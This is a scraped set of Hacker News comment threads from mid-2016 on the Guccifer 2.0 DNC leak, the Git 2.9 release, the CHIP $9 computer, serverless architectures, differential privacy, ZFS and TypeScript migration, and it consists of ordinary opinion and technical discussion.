If Guccifer 2.0 writes a blog about "My first 10 minutes on a server" It would be a great read and we would know he reads hacker news.
4
SlipperySlope 2 days ago 3 replies      
I read the convincing CrowdStrike detailed and technical description of how the DNC server got hacked. CrowdStrike saw the tracks of two known Russian groups.

The published documents to me look real. The SECRET document from the State Department had the obviously secret item that the USA will not nuke terrorist training camps nor hideouts in Pakistan. Official US policy is that all tools are on the table.

Question is how did the SECRET document get on to the DNC server?

Regarding Guccifer 2.0, I believe this is Russia's obfuscation of their release of these damaging documents. They want to help Trump, but must not admit it for fear that Obama takes action now, Hillary takes action if she is elected, or even if Trump wins - Russians helping him might actually hurt him given the foreign interference in USA elections.

5
rhema 2 days ago 1 reply      
Seems like the DNC does not have a great track record on computer security. The Sanders campaign filed suit on the DNC. Both Sanders and Clinton may have been able to access each others files.

According to CNN, Wasserman Schultz said:"[The Sanders staff] not only viewed it, but they exported it and they downloaded it... We don't know the depth of what they actually viewed and downloaded. We have to make sure that they did not manipulate the information... That is just like if you walked into someone's home when the door was unlocked and took things that don't belong to you in order to use them for your own benefit. That's inappropriate. Unacceptable."

Maybe you shouldn't leave your front door open.

[1] http://www.cnn.com/2015/12/18/politics/bernie-sanders-campai... .

6
0xCMP 2 days ago 1 reply      
If/when wikileaks begins to talk then we'll know if it was a legit leak.

The docs listed aren't the full dump, just "proof" that there is more.

7
dinger 2 days ago 1 reply      
Very interesting thread about this here: https://twitter.com/pwnallthethings/status/74317975006403788...

Looks like it may still be Russia

8
exabrial 1 day ago 0 replies      
2016: Giant meteor hitting the Trump vs Hilary debate and wiping out them and their fervent supporters is our only chance of surviving.
9
chollida1 2 days ago 0 replies      
Did they just out Jim Simmons of Renaissance technologies as donating $5,000,000 to the democrats?

Robert Mercer won't be happy:)

https://www.opensecrets.org/news/2016/06/a-hedge-fund-house-...

David Shaw of D.E. Shaw fame is there as well.

10
supergirl 2 days ago 2 replies      
media made it sound all but official that Russia hacked them.of course no one ever publishes any proof for these sort of claims.
11
dpweb 2 days ago 2 replies      
That playbook is weak. Real research would be a lot more explosive than that.

How could one prove it? Describe the hack in detail in a message and sign it with a key?

12
soared 2 days ago 3 replies      
The x.wordpress.com domain made me smile, is there a history of hackers using one-off free/hosted blogs for releases like this? It goes against every one of my marketing bones, but it is so dam cool.
13
235337 2 days ago 0 replies      
I love how easy attribution is now a days! They use multiple Virtual Machines and and English and Russian fonts, must be Russian.

I also love how both sides instantly blamed the other.

Obviously trump hacked the DNC and then released its oppo research (on him) to hurt Hillary. Either they removed all the bad stuff, or wanted to release it all at once and force the attribution to Hillary.

or

Obviously Hillary Hacked the DNC and released the oppo research on trump to cause an easy document dump and get media attention on all her weak oppo research

No Expert's Opinion or Confirmation Bias going on today.

Edit: It is totally possible some extra "secret" attribution is going on by bigger entities.

14
duiker101 1 day ago 2 replies      
I am sorry if this is a stupid question but why does anyone care if it's Russia, China or a lone US hacker? What's the point of discussing that over the content of this documents?
15
ghshephard 1 day ago 0 replies      
These documents are 8+ years old. The National Security document is from 2008. Talks about Don't ask, Don't tell. Discusses Reversing a bunch of Bush Doctrine. Repealing don't ask/don't tell. And is focussed on Obama first 100 days, Not hilary.
16
yepnopemaybe 1 day ago 1 reply      
Among the files made public is one named big-donors-list/

Under a tab named Not Met With and a heading called Obama Billionaires appears the name Charles Koch.

Obviously, this may indicate that Koch raised funds for Obama in some capacity and that Clinton would like to reprise that relationship. Obviously, that makes no sense.

17
vmp 1 day ago 0 replies      
OT: HN posts are starting to resemble "fake news" in the game Uplink. [1] :)

[1] http://i.imgur.com/FeFPcwj.png

18
callesgg 1 day ago 1 reply      
Stuff is always hacked by one person. If that person works for some sort of organization does not really alter the "hack".
19
jjawssd 2 days ago 0 replies      
Guccifer 2.0 is a psyop pumped by the DNC
21
pbreit 1 day ago 0 replies      
So is there anything interesting here?
22
21 2 days ago 6 replies      
Another interesting theory: The Trump campaign alleges that the DNC hacked itself

https://twitter.com/JTSantucci/status/743194156739108865/pho...

23
poozer305 2 days ago 1 reply      
"Guccifer may have been the first one who penetrated Hillary Clinton ... but he certainly wasn't the last."
24
SixSigma 1 day ago 0 replies      
False flag to offset the email server lies.
25
mungoid 1 day ago 0 replies      
Russia does not have America's best intrest in mind so if they did secretly do this to help Trump, that's more of a reason to NOT vote for him
16
Git 2.9 released github.com
351 points by bootload  1 day ago   77 comments top 14
1
neogenix 1 day ago 5 replies      
"In 2.9, Git's diff engine learned a new heuristic: it tries to keep hunk boundaries at blank lines, shifting the hunk "up" whenever the bottom of the hunk matches the bottom of the preceding context, until we hit a blank line. "

I like the new diff improvements

2
Spiritus 1 day ago 1 reply      
Bitbucket[1] also mentions a few other new cool stuff in 2.9, like making the `--verbose` flag to `git commit` default:

 git config global commit.verbose true
[1] https://blog.bitbucket.org/2016/06/13/git-2-9/

3
icefox 1 day ago 2 replies      
Hidden at the end of the changelog is the addition of the the new config entry: "core.hooksPath" which lets you specify globally or per repository where hooks should point to.

In the Git-hooks project we have been using the init.templatedir which this replaces (as it is better), but for those that can't upgrade to 2.9 you can use init.templatedir and some variation of what Git-Hooks does to obtain similar results.

https://github.com/icefox/git-hooks/blob/master/git-hooks#L1...

4
exDM69 1 day ago 1 reply      
The new "rebase -x" seems really useful. It runs a test script on all patches in the history, making it useful for getting a bunch of patches tested for merging at once.

This makes it easier to not have broken commits (e.g. ones that don't build) in master, which in turn makes git bisect more useful.

5
hkjgkjy 1 day ago 4 replies      
OT

The new diff script (https://github.com/git/git/blob/master/contrib/diff-highligh...) is juicy indeed.

It is written in Perl. The Perl interpreter is available on most UNIX systems, so that's handy. I wonder if there is any Lisp-like language that is as common, that you can write scripts and expect them to run on most systems. Would be nice since Lisp languages have very few concepts to learn...

6
cpdean 1 day ago 1 reply      
'git' is the name of the command line interface. the VCS is technically called "git's monster"
7
fidz 1 day ago 0 replies      
What is the algorithm of heuristics diff? Is it comparing longest-match?

 So, if i originally have x b n then adding x a n on top of it, it will become x a n x b n
How can i know that i add x-a-n? Basically, isn't it comparing x-b-n and detect it has changes on 'b' block, so the 'b' block become a-n-x-b?

Edit: My bad, didn't see this https://news.ycombinator.com/item?id=11915351. It has been explained there.

8
mr_sturd 1 day ago 1 reply      
> Faster and more flexible submodules

I have a big, monolithic repository which I'm looking to break up in a migration to Git.

If I run;

 git submodule split -P <path_to_sm> -b <name_of_branch> --jobs=4
Will I see the same improvements, as documented?

9
rplnt 1 day ago 1 reply      
I haven't been following releases for a while, it's nice to see that submodules can now (2.8) be actually used.

Just curious, were there any changes to sparse-checkout? It had abysmal performance in pre-2.x if you threw more elaborate paths at it, or more paths in general.

10
systemz 1 day ago 1 reply      
Are they planning to simplify standard day to day command from flag nightmare to something that mortal can actually remember?
11
nilsjuenemann 1 day ago 2 replies      
Is there already a pre-built package for MacOSX?
12
msoad 1 day ago 0 replies      
Oh I should compare the new coloring with DiffSoFancy. I think DiffSoFancy still wins!
13
desireco42 1 day ago 3 replies      
Great release. Submodules are bad practice riddled with problems, I think it wouldn't be bad to remove this feature at all, that way no-one will be have an option to use it.
14
rco8786 1 day ago 2 replies      
Over/under until git supports emoji in commit messages?
17
CHIP $9 Computer getchip.com
366 points by unusximmortalis  2 days ago   212 comments top 32
1
Aissen 2 days ago 8 replies      
More like the $15.22 computer with shipping. And said shipping cost is hidden at the third stage of ordering, well after you've given your email (hello dark pattern).

At least the $6.22 shipping cost to my European country is reasonable and the same for two CHIPs (3: $7, 4: $9, 5: $11). I recall it was much higher during the kickstarter (and they worked to reduce it, as it seems on the campaign page).

Edit: PockeCHIP shipping is $11

2
codemonkeymike 2 days ago 4 replies      
By being/attempting to be the "low cost leader" really brings out the worst people in comments. People who complain about shipping and packaging and the price on other sites and the price of other products, on and on and on. You couldn't pay me to be in such a market I feel bad for those who provide a cheap service or product and then get the worst feedback one could get.
3
SloopJon 2 days ago 3 replies      
Can't remember whether I've seen this before. A few details after reading through some of the docs:

 * powered by Allwinner R8 (ARM Cortex-A8) with some proprietary bits * Debian-based CHIP O/S preinstalled on 4 GB flash * one micro USB port for power (supports USB OTG if powered by battery) * power connector for battery * one USB 2.0 port * one TRRS port for audio and composite video * built-in WiFi and Bluetooth * VGA adapter available for $10 * HDMI adapter available for $15 (no audio) * case available for $2

4
donquichotte 2 days ago 2 replies      
It's interesting that they distribute the "CHIP Flasher" as a Chrome app. It seems very user friendly but somewhat opaque. And it's a pity there's not much info on the hardware.

Anyway, I've ordered two pieces. They're probably going to gather dust alongside my Raspberry Pis and Arduinos once the initial excitement has worn off. :)

[EDIT] OK there's lots of info on the hardware, just not easy to find on their sales page: https://github.com/NextThingCo/CHIP-Hardware/

5
pmorici 2 days ago 5 replies      
I'm having a hard time finding a reason why I would buy this over the Raspberry Pi. Like others have said for this to be useful as a general purpose computer you need to buy add-on boards for video. Compare that to the RPi Zero which is $5 bucks and includes an HDMI port. You can easily add a USB ethernet or wifi adapter to the zero for under 4 bucks and have a real $9 computer.

Not to mention the CHIP uses an AllWinner processor which has a record of not playing well with open source and a history of security issues.

6
thom_nic 2 days ago 0 replies      
I was an early Kickstarter backer and got mine right around the beginning of 2016. For me the sweet spot was small size, and WiFi. Note this was before The RPi3 was announced with onboard Wifi. CHIP had an early issue with flash corruption (no surprise there are always some issues with v1 hardware) but seem to have that sorted out with a firmware fix and mine has been running without issue for weeks.

Compared to the original RPi which required an $11 WiFi USB dongle and a powered USB hub this is a lot simpler. I primarily used it as a headless sensor node or wireless/networked LCD display. It's perfect for that and still one of the lower-cost options even after shipping $$.

Their documentation (http://docs.getchip.com/) and forum are actually pretty great. I think this will be a good contender if/ when they reach general availability.

7
mavci 2 days ago 4 replies      
Why is HDMI adapter worth $15? It's like create a hardware and split expensive parts and sell with low price marketing. It's not $9 computer, It's actually ~$35
8
SwellJoe 2 days ago 1 reply      
I've been waiting for the PocketCHIP to become reality before ordering anything. It looks like they're planning to ship this month, so it might be time to order.

I love that it includes a game dev kit that includes a music tracker...that's what I want it for. I have an original GameBoy for making music with LSDJ, and it's a lot of fun. But, it is difficult to find good condition GameBoys for anything approaching a reasonable price these days. I'd love to have something a bit more modern with the same basic feel and sound.

The PocketCHIP has the advantage of having a "real" computer inside and a QWERTY keyboard, so if I get bored with four note polyphony, I could run something like SchismTracker or SunVox or whatever. It is in the sweet spot for me for this kind of device, in a way that the Raspberry Pi hasn't been (though the Pi is cool, too).

9
pi-rat 2 days ago 1 reply      
Still waiting for the CHIPs i ordered several months ago :/
10
codezero 2 days ago 1 reply      
I'm stoked for the PocketCHIP.
11
Illniyar 2 days ago 1 reply      
The chip has been on HN on and off for months. Is there something new happening?
12
jetskindo 2 days ago 1 reply      
This is amazing. Just need to figure out how I can attach a battery to it and everything in my house will be a computer.
13
MistahKoala 2 days ago 0 replies      
Would be helpful if they were more transparent about shipping. I'm not going to go through the motions of pre-ordering just to find out what the total costs are.
14
jokoon 2 days ago 4 replies      
I'd prefer such product if I can just power it and control it over SSH. I don't really need an actual screen plug, as I would not use a home screen on such a tiny thing: it doesn't make sense.

Although the rasbperry pi zero seems interesting, I don't know if I can plug a minimalist, small and cheap screen on a mini-hdmi. Overall there is no point using a classic screen on such tiny devices.

This seems to compete with the raspberry pi zero, and RPi zero doesn't have wifi.

15
newman314 2 days ago 1 reply      
I bought one for June delivery, hopefully it shows up.

What bums me out is that there is no easy board that I can find of the (get chip, pi zero ilk) that comes with an ethernet port. I know I can get a regular Pi but it's too much for my use case.

On a related note, I've been looking for a low cost smart power plug with ethernet (10/100/1000) without much success. If anyone knows of such a beast, please let me know.

IMO, $80 for something like this https://www.amazon.com/ezOutlet-Internet-IP-Enabled-Android-... is too much

16
manmal 2 days ago 0 replies      
Did they really use a banana for scale?
17
znpy 2 days ago 1 reply      
I made a group order for 40 CHIP computers. I was definitely pissed off by the fact that I could only order five of them at the time (but there was no limit on the number of order I could place).

I am looking forward for them to start delivering.

I hope that VAT won't be too high.

18
lil1729 2 days ago 1 reply      
I still can't see a full spec for the soc. Without that, to me, this is uninteresting. Sorry. Perhaps others have different priorities. Having a fully hackable $9 computer would have been a wonderful thing to me.
19
matthewaveryusa 2 days ago 0 replies      
Does anyone know if one of the USB slots can act as a client while the other as a host? I can't seem to find any documentation with that level of detail.

edit: looks like one of them can run in OTG mode (i.e client), that's wonderful!

20
tmaly 2 days ago 0 replies      
I ordered a CHIP over a year ago with the VGA adapter. I think it should be shipping soon. I sort of now wish I had went with the HDMI adapter as I do not have too many VGA systems these days.
21
tluyben2 2 days ago 1 reply      
Anyone know what is that vertical scroll shmup on the image above the gaming header?
22
zhte415 2 days ago 1 reply      
A big market for these that doesn't seem to be mentioned is the potential for business presentation use: sales, training, basically anything in an office.

Why carry a laptop, when the location you're going to has a projector screen you'll use, and likely has a keyboard (or carry a portable input device), and a power supply. And your files are cached on your favourite cloud.

Make a nice looking case for these, and they're impressive novelties, lighter than the lightest laptop, and probably a bit more stable than driving a projector from a phone.

23
vegabook 2 days ago 0 replies      
CHIP's $9 pitch is nothing special anymore, with that Rpi device for $5 now, but the PocketCHIP wrapper is still a strong USP. Here is an IoT device where you don't need a soldering iron to actually get basic, useful stuff going.
24
dboreham 2 days ago 0 replies      
I ordered these the day they announced. Not sure if mine have shipped yet. Excited to see them.
25
LandoCalrissian 2 days ago 0 replies      
I ordered mine in November, when are they actually planning on shipping?
26
LeonidBugaev 2 days ago 1 reply      
Can I start using CHIP without a display? Like ssh access when connected to USB or via Bluetooth?
27
durpleDrank 2 days ago 0 replies      
Do they keep costs down because they are using conflict minerals?http://enoughproject.org/special-topics/progress-and-challen...
28
rbanffy 2 days ago 0 replies      
It's a bit frustrating there is no easy way to change the shipping address after the preorder.
29
ruffrey 2 days ago 0 replies      
I ordered one. With tax and shipping to Northern California, it was over $16.
30
mvdanj 2 days ago 0 replies      
Is it shipping soon ?
31
avodonosov 2 days ago 0 replies      
where to get time to play with all the toys....
32
Annatar 2 days ago 2 replies      
Impressive hardware, but UGH!, not yet-another-Linux powered computer! If I had the time, I'd port illumos to it myself, but since I don't, Linux on this thing makes it a non-starter for me.
18
Serverless Architectures martinfowler.com
363 points by nu2ycombinator  20 hours ago   132 comments top 29
1
stickfigure 13 hours ago 4 replies      
By this definition, we've been running "serverless" on Google App Engine for most of a decade.

* We don't monitor how many instances are running and don't really care. Our "functions" are http endpoints. GAE spins up or down instances to meet the load. Our interface with "instances" is just the size of the bill at the end of the month.

* Async task processing is also just an http endpoint function. We even have a little bit of syntactic sugar so it looks like we're just adding functions to a queue.

* We have no ops or devops staff. We just deploy code that implements functions (http endpoints).

* Persistence is also scaled by Google; there's no database server, just an API to read/write data that scales infinitely (or at least, scales with linearly our bill, not limited by the dataset).

It sounds to me like the article is trying to distinguish between "serverless" and PaaS by describing PaaS done poorly. For the longest time, GAE didn't even expose the # of instances servicing your app. They've exposed a lot more of the underlying constructs since, but you can still ignore them unless you're trying to hyperoptimize your bill.

2
loup-vaillant 16 hours ago 1 reply      
What kind of evil genius devised a term that suggests peer-to-peer, to describe something that relies more than ever before on central services and authorities?

It feels like "intellectual property" all over again which suggests the rules used for rival goods can be used for ideas, hence ignoring the difference between moving and copying.

3
mikegerwitz 15 hours ago 3 replies      
There are a number of things I find alarming about this (which is nothing new):

Firstly, the author is encouraging the conversion of traditional web pages to single-page web applications, which means that users would now have to download actual software to use the website rather than using the software that they already have and trust: their web browser.

Perhaps most alarming is the acknowledgement of this:

> One of the main benefits of Serverless FaaS applications is transparent production runtime provisioning, and so open source is not currently as relevant in this world as it is for, say, Docker and containers.

This highlights the major issue of SaaSS/SaaS, and FaaS takes it to the extreme:

https://www.gnu.org/philosophy/who-does-that-server-really-s...

Not only does the user not have control (as in the case of SaaS), but in the case of FaaS, the actual author is relinquishing the same control.

These suggestions all "make sense" from an architectural perspective (depending on who you ask, and depending on the software being written). But I plead for others to consider whether this is necessary in their particular instance; it's the default thinking now-a-days: want to write a program? Want a wide audience? Want it to scale? Put it on the Web, make it a service, store it and all user data on someone else's computer, and call it "the cloud".

I expressed my opinions and concerns at LibrePlanet 2016:

https://media.libreplanet.org/u/libreplanet/collection/resto...

4
infodroid 18 hours ago 2 replies      
It is misleading that the HN title suggests the author is Martin Fowler, but this is not the case for this guest article. The actual author is Mike Roberts, the article is hosted on Fowler's site.
5
gmazza 17 hours ago 4 replies      
Serverless = new name for PaaS.

VPS (virtual private servers) were available (and largely ignored) for quite a while before 2006, when AWS came along with the catchy word "cloud". This single word changed everything. Same technology all of the sudden became cool, and everybody started using it.

Maybe now it is the turn of PaaS [1] - call it "serverless" and folks finally start seeing all the benefits (true scalability, efficient resource utilization, timely and painless software upgrades, et c.)?

[1] https://en.wikipedia.org/wiki/Platform_as_a_service

6
Spearchucker 18 hours ago 4 replies      
The API gateway made me smile. In the 90's we had message queues. In the 00's we had service busses. Today we have API gateways. All they do is route requests - they're all the same thing.

There's merit in serverless, no doubt. There are many things that worry me. Not owning the infrastructure means I don't get the telemetry I'd like, making triage difficult. Direct access to the database is a good idea said nobody ever. And at what point does my own infrastructure become more cost-effective than cloud?

Those concerns don't invalidate the applicability or relevance of serverless though. I think its value as a protyping tool, or to validate a proof of concept is huge.

7
kabes 18 hours ago 3 replies      
How did this came to be known as serverless?It just seems to be an extreme case of microservices running on someone else's computer?
8
stephenr 18 hours ago 0 replies      
Why not MTTaaS - Misleading Technology Terms as a Service.
9
Animats 6 hours ago 0 replies      
It's just outsourcing. It "depends on 3rd party applications / services (in the cloud)" It's like Salesforce's "No Software".

A real serverless architecture would be federated, like BitTorrent or Bitcoin.

10
Mister_Snuggles 13 hours ago 1 reply      
The serverless architecture appears to have many servers provided by different people instead of having no servers, as "serverless" leads me to think. Is this just trading wrangling a server farm for wrangling contracts with 3rd party service providers?

Am I missing something?

11
winteriscoming 13 hours ago 0 replies      
As someone previously noted about serverless architecture - https://twitter.com/jf/status/739971456302350336
12
TorKlingberg 17 hours ago 5 replies      
Is Google App Engine an example of serverless? The user does not really think about servers, and the code is mostly written as event handlers. The abstraction is a bit leaky though, and you can tell that there are instances being spun up and down.
13
jtwaleson 17 hours ago 1 reply      
If your PaaS supports scaling down to zero (Heroku free tier, Cloud Foundry somewhere in the future) and resuming on incoming traffic, it's basically a much better version of FaaS. The way you deploy code, the way services are coupled to the app etc is much better.
14
i_have_to_speak 15 hours ago 1 reply      
Ah, the PetStore example brings back memories! Wonder how many people remember it?
15
jlward4th 15 hours ago 2 replies      
In regards to Stateless and 12 Factor...

> This has a huge impact on application architecture, albeit not a unique one - the Twelve-Factor App concept has precisely the same restriction.

While 12 Factor does say that processes should be stateless I've never thought it really meant it. Connection Pools and in-memory caches are pretty typical in 12 Factor (or all non-serverless) apps. And for me that is what makes serverless kinda silly. Some global state is actually pretty useful when you can avoid the overhead of initializing things or going over the network.

16
amelius 17 hours ago 1 reply      
The article totally skips (serverless) federated architectures, which are more interesting, in my opinion.
17
krislig 8 hours ago 0 replies      
"1. Often require vendor-specific language, or at least vendor-specific frameworks / extensions to a language"

...

"(1) is definitely not a concern for the FaaS implementations Ive seen so far, so we can scrub that one off the list right away."

That point do not make any sense to me. You have to follow the AWS Lambda programming model which is specific to AWS Lambda, so either way you are tied to some libraries and patterns which are vendor-specific.

18
ecthiender 8 hours ago 0 replies      
I think the word serverless makes more sense in p2p/decentralized architectures, than in platforms using pre-built servers.
19
Touche 16 hours ago 1 reply      
With this type of architecture, aren't you creating latency by separating out the "backend" from the database? In the traditional approach the backend server and database are in the same datacenter, but it seems that's often not the case in FaaS approach, what are the ramifications of that?
20
joefkelley 11 hours ago 1 reply      
The one thing I haven't seen discussed in the serverless world is state as optimization.

For instance, if I have a machine learning application that has to access a very large trained model, I would like to load that model into memory at application startup. Loading from disk at every "function call" would be too slow. So would making RPC calls to some external "model cache" service.

Does AWS Lambda / similar have some sort of overridable "init"?

21
agentgt 14 hours ago 0 replies      
We sort of do this for a JVM with the exception that it is the JVM and you really can't be rebooting it all the time.

What we do is use a message queue and extreme thread isolation. Are internal framework is sort of analogous to an actor framework and/or Hystrix but is stateless through out. Messages are basically functions that need to be run.

That being said because our whole architecture is message driven and uses a queue with many client implementations we have been experimenting with OCaml Mirage and even some Rust + lightweight container because of the serious limitation of booting up the JVM.

22
zippy786 13 hours ago 1 reply      
http://martinfowler.com/articles/serverless/sps.svg

Is there something wrong that the client browser is connecting directly to the database, so JS -> MySQL direct connection won't expose credentials ?

23
k__ 9 hours ago 1 reply      
How does this work with WebSockets?

Like, a bit more than FaaS, but less than PaaS?

24
findjashua 11 hours ago 0 replies      
s/serverless/zero-ops/g
25
Aaronik 4 hours ago 0 replies      
#content { margin: auto;}

y/w :D :D

26
dreamdu5t 3 hours ago 0 replies      
Serverless now means "servers in the cloud" ? So what do we call apps that don't use servers!? I'm actually writing one right now...
27
api 10 hours ago 1 reply      
Trouble is most of these are completely single vendor and closed. If you build your app for Lambda, theoretically you've built it to run on one computer: the AWS lambda "main frame."
28
qaq 14 hours ago 0 replies      
shared hosting reinvented :) Name is way cooler though
29
known 14 hours ago 0 replies      
Torrent ?
19
What is Differential Privacy? cryptographyengineering.com
343 points by sohkamyung  3 days ago   95 comments top 10
1
ianmiers 2 days ago 1 reply      
This is something Apple really needs to release all the details of. Even if they got the crypto exactly right, they could have picked a privacy budget/ security parameters that just leaks everything.

And there is every reason to be skeptical about Apple's ability to design even mildly complex crypto given iMessage's flaws. Although the break in iMessage wasn't practically exploitable, that was luck and the fact that the only way to detect if a mulled ciphertext decrypted required attachment messages. The cryptographic mistakes were bad. Given any way to detect decryption of mulled ciphertexts for standard messages (e.g. sequence numbers, timing, actively synching messages between devices, delivery receipts from iMessage instead of APSD), Apple's crypto design bugs would have eliminated nearly all of the E2E security of iMessage.

Remember, this isn't a boon for user privacy. Apple is now collecting far more invasive data about users under the claim that they have protections in place. At best it preserves the status quo and does so only if Apple both picked the parameters correctly and implemented it correctly.

At this point Apple's position should be best summed up as: we have drastically reduced your privacy except not because magic that we (i.e. Apple) do not fully understand.

2
bo1024 2 days ago 2 replies      
I've read a couple articles and haven't seen any details about how they're going to apply DP (differential privacy).

It's important to clearly distinguish what DP can and cannot do. DP is just a technique for taking a database and outputting some statistic or fact about it. The output has some noise added to it.

The guarantee of DP is (roughly) that anyone looking at the output alone won't learn much about anyone in the database. This also holds for anything you do with that statistic.

Think about this carefully when thinking about what DP does and doesn't promise. Also think about the difference between "privacy" and "security".

Example of what DP does protect against: If Apple is recommending products to people based on others' download habits, and this recommendation is based on differentially private statistics, then no other user or group of users can infer anything about my downloads. In fact, even engineers at Apple, if they can only see the statistics and not the original database, cannot infer anything about my downloads.

Example of what DP does not protect against: government accessing the data. The database still has to exist on Apple's servers. The government can get to it just as easily as before via warrants or so on. DP is not cryptography.

My assessment: On one hand it is awesome that Apple is taking a lead in using differential privacy and thinking about mathematical approaches to privacy. On the other, there are many facets of privacy and right now I think people are more concerned about security of their data and privacy from the government, or else privacy from companies like Apple itself. DP doesn't address these; it only addresses the case where Apple has a bunch of data and wants the algorithms it runs not to leak much info about that data to the world at large.

3
cromwellian 2 days ago 0 replies      
Some dissenting views on the utility of differential privacy: https://medium.com/@Practical/differential-privacy-considere...

Also, Apple is woefully low on details, theoretical privacy should be accompanied by openly published research papers that are peer reviewed. I understand they won't release the source, but would you trust Apple if they said they invented a new encryption algorithm, but refuse to publish an academic paper on it? I'd be interested precisely in what they're doing. Are they claiming they're doing federated learning, by gathering anonymous image data from photos, uploading it to their cloud, training DNNs on it, and then shipping the results back down to clients for local recognition? Surely they're not training on device, as this is very RAM and CPU intensive.

4
guelo 2 days ago 4 replies      
Apple backed themselves into a corner by marketing themselves as the super-privacy company in contrast to Google. The problem is that all the data collection lets you do some really useful stuff that benefits the user. So now they're spreading FUD while trying to pretend that they're not collecting the same type of data that Google does. Google has been using differential privacy for a while in different projects.
5
ekianjo 2 days ago 2 replies      
> On the other hand, when the budget was reduced to a level that achieved meaningful privacy, the "noise-ridden" model had a tendency to kill its "patients".

Uh, the graph is just showing you get an increased 25% estimated risk of mortality from Warfarin, nothing close to "killing patients". Complete exageration, since the mortality baseline is probably very low in the first place.

6
EGreg 2 days ago 0 replies      
If you collect values of random variable Y from phones, where Y = X + N (N being normally distributed with mean 0 and var Y = var X, say) then many statistics can be calculated with that.

The law of large numbers says that after gathering statistics from many values of Y, they will converge (for continuously differentiable functions of X) to the values for X.

Yes?

Meanwhile each individual user will not send so many samples as to identify the true values of X with any useful accuracy.

7
hfsbtnye 2 days ago 5 replies      
I have to admit, I'm really starting to like the direction that Apple is heading despite being previously disenchanted. I only wish that they would go ahead and put everything under a free software license, since they're in the business of selling hardware that's coincidentally bundled with their software.
8
nxzero 2 days ago 0 replies      
Seems to be a huge amount of speculative commentary, which is acknowledged, but to me, not a way that shows the potential variation in implementing DP.

For example, Apple could easily download all the data, do a DP on the impact of adding the data to the existing aggregate data, clean out indentiers, and add it to the database.

Key here is that Apple has all the data, then purges the indentiers from it, which is completely different than removing the indentifiers before sending to Apple._______

(Apple:) "Hi, I'm Apple, Trust Me! Don't mind the black bag, I just likely being mysterious, it's cool, right?"

(Me:) "Umm, no, no thanks!"_________

Apple needs to let go of the whole security through secrecy ploy, since it looks more and more shady.

Imagine if security modules for devices where public and non-secure section of the devices had to be encapsulated for EmSec and tamper proof. If this was the case, security literally wouldn't be an issue; either everyone is impacted, or no is impacted.

9
chmike 2 days ago 0 replies      
Does it mean that Apple will randomly insert turds in my messages so that it looks like the average user ?
10
kordless 2 days ago 0 replies      
It's time for an Open Communications initiative. Time for companies to stop owning the platform. Time for all of us to stand up for our right to communicate with who we want, when we want, without being monitored, inspected, blamed, or advertised to. Enough is enough. It's time for a change.
20
ZFS: Apples New Filesystem That Wasnt dtrace.org
295 points by swills  2 days ago   127 comments top 10
1
tracker1 2 days ago 9 replies      
It's kind of a shame that ZFS hasn't seen better adoption, and that btrfs has been pretty stagnant, and that in general next generation file systems are mostly still-born. It would be nice to see some improvements in this area as 10tb hdd's are eminent, and data management is important.

However, it's worth noting that RAID, especially in software on systems without ECC ram is less than ideal. Beyond this is the overhead of managing larger filesystems with ZFS. The DIY raid servers that support it have had some troublesome issues that I've experienced first hand.

It's likely a lot of these advantages have been displaced by the discontinuation of Apple's server projects as well as other fears. By similar note, I've always been somewhat surprised that NTFS hasn't been more popular for external media, as it's a pretty good fit there.

In the end, software at this level has been held back significantly by the patent hornets nest that exists in the world today. I truly hope that we can see some reform in this space, but with the likes of TPP and similar treaty negotiations around the world today, that is pretty unlikely. Eventually some countries will have to strike out, break these bad treaties and reign in IP law. The vast majority of software is undeserving of patent protection. Just as software really shouldn't have copyright law that lasts for decades. It's a shame all around.

2
rdtsc 2 days ago 1 reply      
In general is it just me or has ZFS become more popular lately. Saw Ubuntu get behind it, even in light of Btrfs being available for many years now. https://github.com/zfsonlinux/zfs/commits/master is pretty active...

It seems everyone at some point expected Btrfs to shoot ahead and leave other file systems in the dust, so there was no point in bothering with ZFS, "just wait a bit and Btrfs will be the default everywhere". And besides ZFS has all the legal issues with it.

But it seems Btrfs progress was rather slow, so even in spite of legal issue interest in ZFS is still growing.

3
jhugg 2 days ago 2 replies      
Seems like running on SSD/NVRAM may call for some new thinking. Running on watches may be even secondary to that.

Not that ZFS wont run well on SSD, but it feels like theres a gulf between filesystems designed with SSDs in mind and those designed with spindles in mind.

4
raattgift 2 days ago 1 reply      
Meanwhile, this works, is under active development, and is essentially at HEAD of both openzfs and zfsonlinux:

https://openzfsonosx.org/

5
cbsmith 2 days ago 2 replies      
People forget that Microsoft has perennially had their Cairo/Object/Whatever FileSystem in development.
6
gribbly 2 days ago 2 replies      
So, according to this article, Apple was making a deal with Sun to use ZFS, and later finally dropped it after an alleged discussion between Steve Jobs and Larry Ellison when Oracle owned it.

My question is why did Apple think they needed to make a deal to use ZFS in the first place, and if so has Canonical (who says they'll ship openZFS with Ubuntu) made a deal with Oracle ?

It's true that OpenZFS is more than Oracle's ZFS, but unless I'm mistaken, the vast majority of code in that project is still owned by Oracle.

This article makes me uneasy.

7
snarfy 1 day ago 0 replies      
Maybe I'm being irrational, but I would never touch ZFS because Oracle.
8
falcolas 2 days ago 3 replies      
> this is the moral equivalent of using newspaper as insulation: its fine until the completely anticipated calamity destroys everything you hold dear.

How... unnecessarily inflammatory. Hardlinked backups work remarkably well, and are incredibly simple to implement and understand. Of course they can be corrupted, but then again, so can every other form of backup in existence (that said, there are no protections built-in to a hardlinked backup).

9
beedogs 1 day ago 0 replies      
It's a real shame, because HFS is an absolute abomination. Apple will remain without a reliable, full-featured filesystem for another decade, it seems.
10
williesleg 2 days ago 2 replies      
ZFS is fantastic until you try to grow a volume. Emphasis on fantastic.
21
The DAO is currently being attacked, over 2M Ethereum missing so far etherscan.io
375 points by droffel  20 hours ago   1 comment top
1
sctb 13 hours ago 0 replies      
22
Migrating a 10,000-line legacy JavaScript codebase to TypeScript pgbovine.net
289 points by zjiekai  1 day ago   88 comments top 11
1
ghh 22 hours ago 2 replies      
This is kind of a random Typescript tip, but when migrating regular Javascript, there is an alternative to adding the type 'any' to every object to 'silence' the compiler.

That is to introduce a preliminary type definition. Instead of:

 const oldVar: any = { field: 1, ... } function foo(bar: any) { ... }
You can write:

 declare type OldVarType = any const oldVar: OldVarType = { field: 1, ... } function foo(bar: OldVarType) { ... }
This way, you can signal that it's not just any kind of any, but a particular kind of any, which is now trackable in your codebase.

When you're ready, you can gradually update the OldVarType declaration and solve the compiler type check warnings from there. Union types [1] can be quite useful then too.

[1] https://www.typescriptlang.org/docs/handbook/advanced-types....

2
kevan 22 hours ago 3 replies      
